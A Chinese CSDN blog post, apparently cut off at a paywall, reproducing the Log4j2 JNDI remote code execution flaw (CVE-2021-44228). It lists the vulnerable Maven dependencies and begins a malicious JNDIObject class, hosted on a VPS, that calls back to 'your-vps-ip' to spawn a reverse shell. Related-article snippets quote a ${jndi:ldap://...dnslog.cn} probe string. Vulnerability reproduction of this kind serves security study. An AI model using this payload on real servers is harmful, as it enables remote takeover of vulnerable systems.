Log4j2_RCE漏洞

最新推荐文章于 2024-05-08 04:33:01 发布
最新推荐文章于 2024-05-08 04:33:01 发布
阅读量1.9k 收藏 1
点赞数
分类专栏: 代码审计 java安全 文章标签: java 安全 intellij-idea
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53264525/article/details/122268547
版权
本文详细介绍了Log4j2远程代码执行(RCE)漏洞的复现过程,包括如何利用该漏洞反弹shell。接着分析了官方发布的2.15.0-rc1修复版本,并展示了如何通过特定方式绕过修复。最后讨论了RC2版本的修复措施。文章提供了漏洞利用的关键代码和修复绕过的技巧,对于理解Log4j2漏洞和安全防护具有重要意义。
摘要由CSDN通过智能技术生成

Log4j2_RCE漏洞

前端时间爆出的Log4j2_RCE漏洞可谓是让安全圈提前过年,今天来复现和简单分析下这个漏洞!

漏洞复现

IDEA创建一个web项目,导入如下依赖

<dependencies>
    <dependency>
        <groupId>org.apache.logging.log4j</groupId>
        <artifactId>log4j-core</artifactId>
        <version>2.12.0</version>
    </dependency>

    <dependency>
        <groupId>org.apache.logging.log4j</groupId>
        <artifactId>log4j-api</artifactId>
        <version>2.12.0</version>
    </dependency>
</dependencies>

编写恶意类放到 vps 上

/**
 *  javac -source 1.5 -target 1.5 JNDIObject.java
 *
 *  Build By LandGrey
 * */

import java.io.File;
import java.io.InputStream;
import java.io.OutputStream;
import java.net.Socket;

public class JNDIObject {
   
    static {
   
        try{
   
            String ip = "your-vps-ip";
            String port = "443";
            String py_path = null;
            String[] cmd;
            if (!System.getProperty("os.name").toLowerCase().contains("windows")) {
   
                String[] py_envs = new String[]{
   "/bin/python", "/bin/python3", "/usr/bin/python", "/usr/bin/python3", "/usr/local/bin/python", "/usr/local/bin/python3"};
                for(int i = 0; i < py_envs.length; ++i) {
   
                    String py = py_envs[i];
                    if ((new File(py)).exists()) {
   
                        py_path = py;
                        break;
                    }
                }
                if (py_path != null) {
   
                    if ((new File("/bin/bash")).exists()) {
   
                        cmd = new String[]{
   py_path,
最低0.47元/天 解锁文章
0x6b79
关注
专栏目录
Log4J RCE漏洞
RuiIDS的博客
01-06 748
首先log4j打印日志有四个级别:debug、info、warn、error;不管哪个方法打印日志,正常的log处理过程中,对${这两个紧邻的字符做检测,一旦遇到类似报答是结构的字符串就会触发替换机制。一旦log字符串中检测到${},就会解析其中的字符串尝试使用 JDNI的lookup()方法查询,因此,只要能可攻至log阐述内容,就有机会实现漏洞利用。或者说服务器会记录用户输入的信息;这样log4j RCE都会被触发;
漏洞复现——log4j2-rce(CVE-2021-44228)
小林说安全的博客
05-29 2039
漏洞复现——log4j2-rce(CVE-2021-44228)
Log4j2-RCE
xlsj雪松的博客
12-26 3110
1 Log4j2漏洞官方描述 Apache Log4j2 版本 2.0-alpha1 到 2.16.0(不包括 2.12.3)没有防止自引用查找的不受控制的递归。当日志配置使用带有上下文查找的非默认模式布局(例如,$${ctx:loginId})时,控制线程上下文映射 (MDC) 输入数据的攻击者可以制作包含递归查找的恶意输入数据,导致 StackOverflowError 将终止进程。这也称为 DOS(拒绝服务)攻击。 Log4j 2.x 缓解措施 升级到 Log4j 2.3.1(适用于 Java
Log4j2 RCE:顶级供应链漏洞
weixin_43263451的博客
08-11 1122
log4j核弹级漏洞出来了一段时间,一直没有基础来分析。补了java基础后赶紧来分析一波Log4j是Apache的一个开源项目,通过使用Log4j,我们可以控制日志信息输送的目的地是控制台、文件、GUI组件,甚至是套接口服务器、NT的事件记录器、UNIXSyslog守护进程等;我们也可以控制每一条日志的输出格式;通过定义每一条日志信息的级别,我们能够更加细致地控制日志的生成过程。最令人感兴趣的就是,这些可以通过一个配置文件来灵活地进行配置,而不需要修改应用的代码。.........
RabbitMQ【部署 01】一篇学会RabbitMQ服务依赖的下载安装及简单使用(首次登录 User can only log in via localhost 问题处理)(1)
最新发布
2301_77121488的博客
05-08 1039
也可以直接安装rabbitmq-server从报错信息里获取需要的版本,由于是同一个网站,下载的方式是一样的,这次也是直接下载安装文件。,朋友们如果有需要全套《网络安全入门+黑客进阶学习资源包》,可以扫描下方二维码领取(如遇扫码问题,可以在评论区留言领取哦)~此时服务已经可以使用了,但是,默认情况下,RabbitMQ是没有安装WEB端插件的,需要手动积获才可以生效。点击下载,可以进行联网下载安装也可以直接进行下载,本次选择直接下载安装文件。因篇幅有限,仅展示部分资料。还有大家最喜欢的黑客技术。
log4j2_rce 项目
02-23
《深入理解Log4j2 RCE漏洞:从概念到实战》 在信息技术领域,安全问题始终是关注的焦点。本文将深入探讨一个重要的安全漏洞——Log4j2远程代码执行(RCE漏洞,该漏洞曾引起全球广泛关注。我们将从项目标题"Log4j2...
代码审计-log4j2_rce分析
cdyunaq的博客
12-14 963
前言 2021年11月24日,阿里云安全团队向Apache官方报告了Apache Log4j2远程代码执行漏洞。 2021年12月9日晚,各大公众号突然发布漏洞预警 Apache Log4j2是一个基于Java的日志记录工具。该工具重写了Log4j框架,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。大多数情况下,开发者可能会将用户输入导致的错误信息写入日志中。 由于Apache Log4j2某些功能存在递归解析功能,攻击者可直接构造恶意请求,触发远程代码执行漏洞漏洞
Log4j2 RCE漏洞分析
03-14
记录一下log4j2 RCE的原理
2024年网络安全最全log4j RCE漏洞原理分析及检测_log4j 漏洞监测
2401_84297193的博客
05-03 446
log4j支持使用表达式的形式打印日志,比如问题就在与表达式支持非常多样,其中有一个jndi就是今天的主题jdk将从url指定的路径下载一段字节流,并将其反序列化为Java对象,作为jndi返回。反序列化过程中,即会执行字节流中包含的程序。因此,如果攻击者能够控制日志打印的内容,就可以使目标服务器从攻击者指定的任意url地址下载代码字节流,攻击者在字节流中附带的代码就会在目标服务器上执行。那么问题来了,攻击者如何控制服务器上记录的日志内容呢?非常简单!大部分web服务程序都会对用户输入进行日志记录。
【LOG4J RCE漏洞分享】
努力学习
12-15 2670
LOG4J RCE漏洞分享 先说结论:有中标,原因在于引⼊的Lo4j2 2.10.0 ,应该绝⼤多业务线都有这个问题,毕竟⽇志组件都是⼀个。 漏洞原因:https://issues.apache.org/jira/projects/LOG4J2/issues/LOG4J2-3201?filter=allissues 漏洞复现: ⽇志打印了,也确实远程执⾏了! 那么同理是不是能够通过JNDI:LDAP的⽅式注⼊⼀个类进来执⾏命令,于是我有⼀个⼤胆的想法! 类加载了。。。命令执⾏了 ...
漏洞预警:Apache Log4j RCE漏洞
热门推荐
weixin_43526443的博客
12-13 7万+
目录 Part1 漏洞描述 Part2 危害等级 Part3 漏洞影响 Part4 漏洞分析及验证 源码分析 Part5 漏洞检测 自我检测 攻击检测 产品检测 Part6 漏洞修复 Part1 漏洞描述 Apache Log4j是Apache的一个开源项目,Apache log4j2是Log4j的升级版本,我们可以控制日志信息输送的目的地为控制台、文件、GUI组件等,通过定义每一条日志信息的级别,能够更加细致地控制日志的生成过程。 近日发现Apache Log4j存在任意代码执行
log4j2-rce-2021-12-09漏洞原理及复现
加油~
07-28 1254
${jndi:ldap://${6666}.6666.dnslog.cn}你懂得~
Log4j2-rce-学习
feng的博客
03-04 774
Log4j2-rce-学习 前言 当时漏洞出的时候在准备期末考试就没管,现在重新拾起来。。 exp package com.summer.test; import org.apache.logging.log4j.Logger; import org.apache.logging.log4j.LogManager; public class Test { private static final Logger log = LogManager.getLogger(); public st
log4j RCE漏洞原理分析及检测_log4j 漏洞监测,网络安全开发基础学习
2401_83621004的博客
04-15 760
漏洞检测时,可以使用 ${jndi:ldap://http://xxx.dnslog.cn} ,如果攻击成功,目标服务器将会从 xxx.dnslog.cn 下载jndi字节流,下载之前首先得连接dnslog.cn进行xxx.dnslog.cn的域名解析,获得真实ip地址。dnslog.cn 是安全检测常用工具之一,在其主页上点击 Get SubDomain 即可以自动生成一个 dnslog.cn 的子域名,这个子域名解析出来的ip是 127.0.0.1,也就是本机地址。因篇幅有限,仅展示部分资料。
网络安全深入学习第四课——热门框架漏洞RCELog4j2远程代码执行)
p36273的博客
09-16 1364
上面第2、3、4、5步都是在攻击者端操作,只有第6步是在普通前端操作。上面一共开启了3个端口,分别是80、1234、9999。这分别对应的是:web服务、接收反弹shell的、ldap服务。------ Log4j2漏洞总的来说就是:因为Log4j2默认支持解析ldap/rmi协议(只要打印的日志中包括ldap/rmi协议即可),并会通过名称从ldap服务端其获取对应的Class文件,并使用ClassLoader在本地加载Ldap服务端返回的Class类。
Apache Log4j2漏洞 (CVE-2021-44228) 分析与复现
未完成的歌~的博客
03-15 1万+
Apache Log4j2 是一个开源的 Java 日志记录工具。Log4j2 是 Log4j 的升级版本,其优异的性能被广泛的应用于各种常见的 Web 服务中。Log4j2 在特定的版本中由于启用了 lookup 功能,导致存在 JNDI 漏洞。lookup 函数是用于在日志消息中替换变量的函数,是通过配置文件中的${}语法调用的,例如:如果在日志消息中使用了,那么 log4j2 将使用 lookup 函数从系统属性中查找名为 “my.property” 的属性值,并将其替换为实际值。
Apache Log4j Server 反序列化命令执行漏洞(CVE-2017-5645)复现
玄道的网安博客
01-28 5010
漏洞概述 Apache Log4j是一个用于Java的日志记录库,其支持启动远程日志服务器。Apache Log4j 2.8.2之前的2.x版本中存在安全漏洞。攻击者可利用该漏洞执行任意代码。 环境搭建 这里使用vulhub来搭建环境 https://github.com/vulhub/vulhub/tree/master/log4j/CVE-2017-5645 进入目录并启动环境 cd vulhub-master/log4j/CVE-2017-5645/ docker-...
Log4j2安全漏洞复现及解决
在Log4j库的历史中,有一个非常重要的安全漏洞,该漏洞存在于Log4j 1.x以及Log4j 2.x的早期版本中。此文档似乎是在尝试复现Log4j2的一个特定版本()中的bug,这通常指的是CVE-2021-44228,也被称为“Log4Shell”...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值